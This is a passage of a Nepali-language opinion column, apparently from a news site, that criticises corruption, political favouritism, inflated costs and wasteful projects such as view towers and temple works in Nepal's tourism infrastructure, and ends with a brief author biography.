भनेर बजेट छुट्याइन्छ । जनप्रतिनिधिको आफ्नै गाउँ वा समर्थक क्षेत्रलाई प्राथमिकता दिने र वास्तविक सम्भावना भएको ठाउँभन्दा भोट बैंक भएको ठाउँमा बजेट लैजाने प्रथा बनेको छ । धार्मिक वा सांस्कृतिक महत्व नभएको ठाउँमा अनावश्यक संरचना निर्माण गर्ने र योजना छनोट गर्दा दीर्घकालीन पर्यटन विकासभन्दा व्यक्तिगत र राजनीतिक लाभलाई प्राथमिकता दिने गरेका उधारण धेरै ठाउँमा भेटिन्छन ।
नेपालमा पूर्वाधारको विकासमा बेथितिको चित्रण गर्नुप¥यो भने सबैभन्दा सजिलो उदाहरण हो– भ्यु टावर । देशैभरि जताततै, आवश्यक नपर्ने ठाउँहरूमा समेत सिमेन्ट र फलामले बनाइएका धेरै भ्यु टावरहरू प्रयोग बिहीन भएका छन । वास्तवमा पहाडका सुन्दर चुचुराहरूमा यस्ता संरचना बनाउनु भनेको स्रोतको दुरुपयोग मात्रै हो । आवश्यकता हो या होइन त्यसको आंकलन छैन । प्रकृतिक रुपमा नै भ्यु टावर भएको डाँडाको चुचुरोमा भ्यु टावर बनेका छन । कतै दुई डाँडाको खोचमा पनि भ्यु टावर ठडिएका छन । यसरी खासै उपयोग नहुने यस्ता संरचना निर्माणको मूल कारण भने यससँग जोडिएको अर्थ राजनीति हो । पूर्वाधार निर्माणबाट हुने सजिलो भ्रष्टाचार । पूर्वाधारको योजनाको लागत अनुमान बढाएर कमिसन खाने प्रवृत्ति भ्रष्टाचारको सबैभन्दा सजिलो माध्यम हो । धेरै योजनामा डीपीआर र अध्ययनमै भ्रष्टाचार हुने गर्दछ । पर्यटन परियोजनाको डीपीआर बनाउन लाखौं खर्च गरिन्छ । तर पुरानै प्रतिवेदन कपी–पेस्ट गरिन्छ । स्थलगत अध्ययन नै नगरिकन रिपोर्ट तयार हुन्छ । अध्ययनको नाममा अनावश्यक खर्च देखाइन्छ । यसरी कागजमै पर्यटन विकास हुन्छ ।
पर्यटन पूर्वाधार निर्माणलाई विकासको मेरुदण्ड मानिन्छ । तर यही क्षेत्रमा धेरै ठाउँमा भ्रष्टाचार, कमिशन, अनियमितता र राजनीतिक स्वार्थको जालो गहिरो रुपमा फैलिएको देखिन्छ । पर्यटन पूर्वाधारमा किन बढी भ्रष्टाचार हुन्छ भन्ने प्रश्नको उत्तर केवल आर्थिक अनियमिततामा मात्र सीमित छैन । यसमा राजनीति, प्रशासन, स्थानीय शक्ति संरचना, ठेक्कापट्टा प्रणाली, कमजोर अनुगमन र विकासप्रतिको विकृत मानसिकता समेत जोडिएको छ । पर्यटन पूर्वाधारमा ठूलो बजेट खर्च हुन्छ । सडक, रिसोर्ट, विमानस्थल, पदमार्ग, भ्यु टावर, पार्कजस्ता संरचनामा करोडौँदेखि अर्बैँ रुपैयाँ खर्च गरिन्छ । ठूलो रकम जहाँ हुन्छ, त्यहाँ कमिशन र चलखेलको सम्भावना पनि बढछ । राजनीतिक नेतृत्वलाई पनि देखिने विकास चाहिन्छ । विद्यालयको गुणस्तर सुधार वा कृषि सुधारभन्दा भ्यु टावर, पार्क उद्घाटन गर्दा राजनीतिक प्रचार बढी हुन्छ । जब विकास प्रदर्शनमुखी हुन्छ, तब गुणस्तरभन्दा ठेक्का, कमिशन र उद्घाटन प्राथमिकतामा पर्छ । धेरै पर्यटन परियोजना विस्तृत सम्भाव्यता अध्ययन बिना सुरु गरिन्छन । कुनै ठाउँमा पर्यटक पुग्छन कि पुग्दैनन् वातावरणीय असर कस्तो पर्छ ? स्थानीय समुदायलाई लाभ हुन्छ कि हुँदैन ? दीर्घकालीन सञ्चालन कसरी हुन्छ ? यी आधारभूत प्रश्नको अध्ययन नगरी परियोजना घोषणा गरिन्छ । यसको मुख्य कारण योजना भन्दा बजेट निकाल्ने मानसिकता हो । अध्ययन कमजोर हुँदा लागत कृत्रिम रुपमा बढाइन्छ, डिजाइन फेरिन्छ, थप बजेट मागिन्छ र भ्रष्टाचारका नयाँ ढोका खुल्छन ।
योग्यता भन्दा राजनीतिक पहुँच, दलगत निकटता वा कमिसनका आधारमा निर्माण कम्पनी चयन गरिने प्रवृत्ति भ्रष्टाचारको जड :
नेपालमा कतिपय भ्यु टावर, पार्क वा पदमार्ग निर्माण भएर अलपत्र पर्नु यही समस्याको उदाहरण हो । पर्यटन पूर्वाधार निर्माणमा ठेक्कापट्टा प्रणाली अत्यन्त प्रभावशाली हुन्छ । धेरैजसो ठेकेदार कुनै न कुनै राजनीतिक शक्ति, कर्मचारी तन्त्र वा स्थानीय प्रभावशाली समूहसँग जोडिएका हुन्छन । यसले गर्दा योग्य कम्पनीभन्दा पहुँचवालाले ठेक्का पाउँछन । कम गुणस्तरको सामग्री प्रयोग हुन्छ, समयमै काम पूरा हुँदैन, लागत बारम्बार बढाइन्छ । कतिपय अवस्थामा एउटै समूहले योजना बनाउने, बजेट पार्ने, ठेक्का दिलाउने र अनुगमन गर्ने चक्र नै नियन्त्रण गर्छ । यस्तो अवस्थामा पारदर्शिता हराउँछ । अर्कोतर्फ पहुँचका आधारमा ठेक्का वितरण योग्यता भन्दा राजनीतिक पहुँच, दलगत निकटता वा कमिसनका आधारमा निर्माण कम्पनी चयन गरिने प्रवृत्ति व्यापक छ । यसले गुणस्तरीय प्रतिस्पर्धालाई कमजोर बनाएको छ । कतिपय ठाउँमा योजना कागजमा सम्पन्न देखाइन्छ तर स्थलगत रुपमा संरचना अधुरो हुन्छ । कतै सूचना बोर्ड मात्रै राखेर बजेट सकिएको उदाहरण समेत भेटिन्छन । धार्मिक तथा ऐतिहासिक सम्पदाको संरक्षणका लागि आएको रकम वास्तविक संरक्षणमा भन्दा दलाल, ठेकेदार र केही कर्मचारीको स्वार्थमा खर्च हुने गर्दछ । यसले सम्पदाको मौलिकता समेत नष्ट गरिरहेको छ । जुन कारणले पर्यटन पूर्वाधारको क्षेत्र भ्रष्टाचारको थलो बनेको छ ।
अहिले समाजमा कमिशन बिना काम हुँदैन भन्ने मानसिकता सामान्य बन्दै गएको छ । जब नागरिकले भ्रष्टाचारलाई असमान्य अपराध होइन, सिस्टम ठान्न थाल्छन, तब पर्यटन पूर्वाधारजस्ता क्षेत्रमा अनियमितता संस्थागत बन्छ । ठेकेदारले कमिशन दिनुपर्ने, नेताले हिस्सा खोज्ने, कर्मचारीले फाइल रोक्ने, स्थानीय समूहले भाग माग्ने यी सबैलाई सामान्य मान्ने प्रवृत्तिले विकासको नैतिकता कमजोर बनाएको छ । पर्यटन पूर्वाधारमा हुने भ्रष्टाचारले केवल पैसा नोक्सान मात्र होइन देशको भविष्यमा गहिरो असर पार्दछ । यसको परिणाम गुणस्तरहीन संरचना, दुर्घटना र जोखिम, पर्यटकको विश्वासमा कमी, प्राकृतिक सम्पदाको विनाश, स्थानीय समुदायको असन्तोष, राष्ट्रिय छविमा नकारात्मक असर पुग्दछ । पर्यटन पूर्वाधारमा बढी भ्रष्टाचार हुनुको मूल कारण कमजोर शासन, राजनीतिक हस्तक्षेप, पारदर्शिताको अभाव, स्थानीय सहभागिताको कमी र विकासलाई प्रदर्शनमा सीमित गर्ने मानसिकता हो । पर्यटन विकास भनेको केवल संरचना बनाउनु होइन यो संस्कृति, प्रकृति, स्थानीय जीवन र राष्ट्रिय पहिचानको संरक्षणसँग जोडिएको विषय हो । अब क्षेत्रमा भ्रष्टाचार नियन्त्रण गर्न सकिएन भने विकासका नाममा प्राकृतिक सम्पदा र सार्वजनिक धन दुवै नष्ट हुने खतरा रहन्छ ।
पूर्वाधारको विकासको योजनामा धार्मिक पर्यटनको भावनात्मक दोहन हुने गरेको छ । नेपालमा धार्मिक पर्यटन अत्यन्त संवेदनशील विषय हो । जनप्रतिनिधिले मन्दिर सौन्दर्यीकरणका नाममा अपारदर्शी खर्च गर्ने गरेका छन । मन्दिर, आश्रम, मूर्ति, धार्मिक पार्क, तीर्थमार्ग निर्माण आदिमा भावनात्मक समर्थन सजिलै पाइन्छ । धर्म जोडिएको विषय भएकाले नागरिकले धेरै प्रश्न उठाउन चाहदैनन् । यही मौनताको फाइदा उठाएर कतिपय पूर्वाधारमा लागत बढाइन्छ, अनियमितता लुकाइन्छ, सार्वजनिक जग्गा कब्जा गरिन्छ, निजी स्वार्थ मिसाइन्छ । धर्मको आडमा हुने भ्रष्टाचार झन खतरनाक हुन्छ । किनकि त्यसलाई प्रश्न गर्नु नै आस्था विरोध जस्तो बनाइन्छ । मूर्ति, गेट, धर्मशाला निर्माणमा कमिसन खाने, धार्मिक आस्थालाई चुनावी लाभसँग जोडने जस्ता प्रवृत्ति पनि धेरै ठाउँमा देखिन्छन । धार्मिक भावनाले प्रश्न कम उठने भएकाले यस्ता योजनामा पारदर्शिता झन कमजोर हुने गरेको छ । पूर्वाधारको क्षेत्रमा सामान्य ढुंगाको पर्खाललाई पर्यटन सौन्दर्यीकरण भनेर महँगो देखाइन्छ । कम गुणस्तरका सामग्री प्रयोग गरिन्छ । यस्तो अवस्थामा ठेकेदार, प्राविधिक र जनप्रतिनिधि बीच प्रतिशतमा भागबन्डा हुने गर्दछ । धेरै स्थानीय तहमा पूर्वाधारका योजना उपभोक्ता समितिमार्फत गराइन्छ । तर व्यवहारमा समिति जनप्रतिनिधिकै नजिकका मानिस हुने गर्दछन ।
विशेषतः पर्यटन पूर्वाधार निर्माण, संरक्षण र व्यवस्थापनका नाममा हुने गरेको अनियमितता अहिले गम्भीर बहसको विषय बनेको छ । पर्यटन क्षेत्रको अपार सम्भावनालाई लाभमा बदल्न व्यवसायी पनि निकै उत्साहित देखिएका छन । पर्यटन क्षेत्रको पूर्वाधारको नाममा केही सडक, कृत्रिम ताल पोखरी, मठ मन्दिरको मर्मत सम्भार र अन्य काम भएका पनि छन । तर, के ती निर्माण भएका काम गुणस्तरका छन त ? सडक निर्माण हुन नपाउँदै भत्किन शुरु हुन्छ । निर्माण भएका ताल पोखरीहरूमा तार जाली समेत छैन । प्रत्येक वर्ष मानिसको मृत्यु हुने गरेको छ । धेरै ठाउँमा बन्न लागेका पूर्वाधार निर्माण कार्य सम्पन्न नहँुदै अलपत्र अवस्थामा रहेका छन । यस्ता अनेकौं पर्यटनको क्षेत्रमा भएका पूर्वाधारका कामहरू छन । निर्माण भएका त्यस्ता कामहरूमा न त नागरिकहरूको चासो छ, न त विकास निर्माणको अनुगमन गर्ने निकायको !  जनअपेक्षा अनुरुप साँच्चिकै पर्यटन क्षेत्रको विकास भएको छ त ? कतिपय पूर्वाधारका योजनामा नियोजित भ्रष्टाचार हुने गरेको छ । यसलाई कारवाही गर्ने कसले ? सचेत नागरिकहरूले प्रश्न उठाउन थालेका छन । यसरी भ्रष्टाचार गर्दा कानुनीरुपमा हुनुपर्ने सम्पूर्ण कुराहरू कागजीरुपमा मिलाइएको हुन्छ । खासगरी यसरी भ्रष्टाचार गर्दा परिणाम र गुणस्तरजस्ता कुराहरूबाट कटौती गरी मोटो रकम भ्रष्टाचारको निम्ति छुटयाइएको हुन्छ ।
पर्यटन क्षेत्रको पूर्वाधार विकासमा देखिने भ्रष्टाचार कमिसनमा मात्र सीमित हुँदैन । धेरैजसो अवस्थामा यो नीतिगत भ्रष्टाचार का रुपमा देखा पर्दछ । जसले कानुन, नीति, बजेट र निर्णय प्रक्रियालाई नै केही सीमित समूहको स्वार्थअनुसार मोडने काम गर्छ । बाहिरबाट हेर्दा योजना वैधानिक र विकासमुखी देखिए पनि भित्रभित्रै निजी लाभ, राजनीतिक पहुँच र दलाल संयन्त्र हाबी हुन्छ । यही कारणले धेरै पर्यटन पूर्वाधारहरू निर्माण भए पनि तिनले अपेक्षित आर्थिक, सांस्कृतिक र सामाजिक प्रतिफल दिन सकेका छैन । नीतिगत भ्रष्टाचार भन्नाले नीति निर्माण, योजना छनोट, बजेट विनियोजन, ठेक्का प्रक्रिया र कार्यान्वयनका नियमहरूलाई निश्चित व्यक्ति, कम्पनी वा राजनीतिक समूहको हितमा प्रयोग गर्नु हो । यसमा प्रत्यक्ष रुपमा अवैध देखिने काम नहुन पनि सक्छ । तर निर्णय प्रक्रियाको मूल उद्देश्य सार्वजनिक हितभन्दा निजी लाभमा केन्द्रित हुन्छ । पर्यटन क्षेत्रमा यसको प्रभाव अझ गम्भीर हुन्छ । किनकि प्राकृतिक सम्पदा, धार्मिक स्थल, सांस्कृतिक सम्पदा र स्थानीय समुदायको जीवन प्रत्यक्ष जोडिएको हुन्छ । पर्यटन पूर्वाधारमा नीतिगत भ्रष्टाचार आवश्यकताभन्दा पहुँचका आधारमा योजना छनोट धेरै हुन्छ । पर्यटकको वास्तविक सम्भावना अध्ययन नगरी नेताको गृहक्षेत्र, कार्यकर्ताको दबाब वा व्यापारीको स्वार्थका आधारमा योजना बनाइन्छ । जहाँ सडक, खानेपानी वा स्वास्थ्य सेवा आवश्यक छ, त्यहाँ करोडौंको भ्यू टावर, पार्क, गेट वा मूर्तिस्थापना गरिन्छ ।
यसले पर्यटनभन्दा राजनीतिक प्रदर्शन बढी देखिन्छ । अध्ययनबिनै ठूला परियोजना घोषणा केबलकार, रिसोर्ट, होटल, विमानस्थल वा धार्मिक संरचना निर्माण गर्दा वातावरणीय प्रभाव, सांस्कृतिक असर र स्थानीय आवश्यकताको अध्ययन नगरी निर्णय गरिन्छ । पछि परियोजना अलपत्र पर्छ, लागत बढछ वा विवाद सिर्जना हुन्छ । धेरै पर्यटन पूर्वाधारका योजनाहरू घोषणामुखी विकासका उदाहरण बनेका छन । ठेक्का प्रणालीमा मिलेमतो गरी सीमित कम्पनीलाई फाइदा पुग्ने गरी मापदण्ड बन्ने गरेको छ । कहिलेकाहीँ एउटै समूहले विभिन्न नाममा प्रतिस्पर्धा गरेजस्तो देखाइन्छ । लागत कृत्रिम रुपमा बढाइन्छ र गुणस्तर घटाइन्छ । परिणामस्वरुप सडक केही वर्षमै बिग्रन्छ । पदमार्ग भत्किन्छ, पार्क प्रयोगविहीन हुन्छ भने भवन अधुरै रहन्छ । यस्ता उधारण धेरै हुन्छन । राष्ट्रिय स्रोतको दुरुपयोग पर्यटन विकासका लागि छुटयाइएको अबौं रकम दीर्घकालीन परिणाम नदिने संरचनामा खर्च हुन्छ । देश ऋणमा डुब्छ तर आम्दानी बढ्दैन । यसले विकास भएको जस्तो देखिने तर प्रतिफल नआउने अवस्था सिर्जना गर्छ । स्थानीय समुदायको विश्वास घटछ । जब स्थानीयले विकासमा पारदर्शिता देख्दैन उनीहरूमा सरकारप्रति अविश्वास बढछ । कतिपय अवस्थामा स्थानीय संस्कृति र भूमि बाह्य समूहको नियन्त्रणमा पुग्छ । यसले सामाजिक तनाव र असन्तोष बढाउन सक्छ । वातावरणीय क्षति अनियोजित सडक, होटल, केबलकार वा संरचनाले वन विनाश, पहिरो, प्रदूषण र जैविक विविधतामा असर पुर्याउछ । पर्यटन टिकाउ हुनुपर्ने ठाउँमा विनाशकारी बन्न थाल्छ । नीतिगत भ्रष्टाचारले प्रचारमुखी परियोजनालाई प्राथमिकता दिन्छ तर आधारभूत आवश्यकतालाई बेवास्ता गर्छ । उदाहरणका लागि दक्ष जनशक्ति, सरसफाइ, सुरक्षा, स्थानीय उत्पादन, सांस्कृतिक संरक्षण, यातायात व्यवस्थापन जस्ता विषय ओझेलमा पर्छन । यसले पर्यटनको दीर्घकालीन आधार कमजोर बनाउँछ ।
भ्रष्टाचार भन्नाले सार्वजनिक वा निजी जिम्मेवारी, पद, अधिकार, स्रोत वा विश्वासलाई व्यक्तिगत लाभ, समूहगत स्वार्थ वा अवैध फाइदाका लागि दुरुपयोग गर्नु हो । सामान्य भाषामा भन्नुपर्दा कानुन, नैतिकता र संस्थागत मर्यादाविपरीत गरिने अनुचित व्यवहार नै भ्रष्टाचार हो । यसले राज्य, समाज, अर्थतन्त्र र नैतिक संस्कारलाई कमजोर बनाउँछ । भ्रष्टाचार धेरै प्रकारका हुन्छन । कुनै काम गरिदिन, सुविधा उपलब्ध गराउन वा निर्णय आफ्नो पक्षमा पार्न पैसा वा उपहार लिनु–दिनु भ्रष्टाचार हो । पदको दुरुपयोग गरी कानुन विपरीत आफ्ना नजिकका व्यक्ति अर्थात नातावाद र कृपावाद योग्यता र क्षमता भन्दा पनि आफन्त, दलगत कार्यकर्ता वा चिनेजानेका व्यक्तिलाई अवसर दिनु भनेकै भ्रष्टाचार । सार्वजनिक सम्पत्तिको दुरुपयोग सरकारी गाडी, बजेट, सामग्री वा स्रोतलाई व्यक्तिगत प्रयोजनमा प्रयोग गर्नु पनि भ्रष्टाचार हो । विकास निर्माण, खरिद–बिक्री वा योजनामा अनियमितता गरेर रकम हिनामिना गर्नु र कानुन, नीति वा निर्णय नै सीमित व्यक्ति वा समूहलाई फाइदा पुग्ने गरी बनाइनु पनि भ्रष्टाचार हो । भ्रष्टाचार गर्नेले सजाय नपाउने वा राजनीतिक संरक्षण पाउने अवस्था सबैभन्दा खतरनाक हुन्छ । गरिबी र बेरोजगारी आर्थिक असुरक्षाले कतिपयलाई गलत बाटो रोज्न प्रेरित गर्छ । कमजोर प्रशासन नियमन, अनुगमन र पारदर्शिता कमजोर हुँदा भ्रष्टाचार मौलाउँछ ।
भ्रष्टाचारको नियन्त्रण तथा निवारण गर्ने काम अत्यन्तै जटिल र चुनौतीपूर्ण छ । सरकार र अन्य निकायहरू पनि यस कार्यमा खटेका छन । यसका लागि निरोधात्मक, उपचारात्मक र प्रवर्द्धनात्मक रणनीतिहरू तयार गरी कार्यान्वयन गरिएको छ । कानूनी रुपले त भ्रष्टाचारलाई अपराध नै मानिएको छ । नेपाल संयुक्त राष्ट्रसंघीय भ्रष्टाचार विरुद्धको महासन्धिको पक्षराष्ट्रसमेत रहेको छ । तर, नेपालले भ्रष्टाचार निवारणमा प्राप्त गरेको उपलब्धि सन्तोषजनक छैन । ट्रान्सपरेन्सी इन्टरनेशनलजस्ता भ्रष्टाचारका बारेमा अध्ययन अनुसन्धान गर्ने संस्थाले विगत डेढ दशकदेखि नेपालमा भ्रष्टाचार व्याप्त रहेको देखाएका छन । नीतिगत भ्रष्टाचार लगायत भ्रष्टाचारका नयाँ नयाँ स्वरुप र प्रकृतिहरू अगाडि आएका छन । यसले गर्दा सार्वजनिक सेवा प्रवाहमा अपेक्षित सुधार भएको छैन र सरकारप्रतिको नागरिक विश्वासमा पनि कमी हुदै आएको छ ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको ग्रामीण पर्यटनका क्षेत्रमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=48890 0